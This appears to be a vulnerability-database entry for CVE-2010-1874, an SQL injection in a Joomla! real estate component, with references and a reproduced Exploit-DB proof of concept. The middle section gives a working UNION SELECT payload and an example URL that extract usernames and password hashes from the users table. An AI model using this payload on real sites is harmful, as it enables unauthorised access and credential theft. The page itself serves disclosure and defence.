CVE-2010-1874
Description
SQL injection vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Author: c4uR [caurcdma@yahoo.com]
Date: April, 10-2010 [INDONESIA]
Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################################################
+++ Vulnerable File +++
http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]
+++ ExploiT +++
-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
+++ Example +++
http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
###################################################################################
----------------------------------------------------------------------------------
DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com
----------------------------------------------------------------------------------
[ thnx to ]
[+] Apartement Griya Semanggi + poisonV
[+] Indonesia gg ada matinye, walaupun terkadang suramApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| com-property | com_properties | 3.1.22-03 | |
| joomla | joomla\! | | |
References
- http://secunia.com/advisories/39074
- http://www.exploit-db.com/exploits/12136
- http://www.securityfocus.com/bid/39374
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57765
- http://secunia.com/advisories/39074
- http://www.exploit-db.com/exploits/12136
- http://www.securityfocus.com/bid/39374
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57765
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.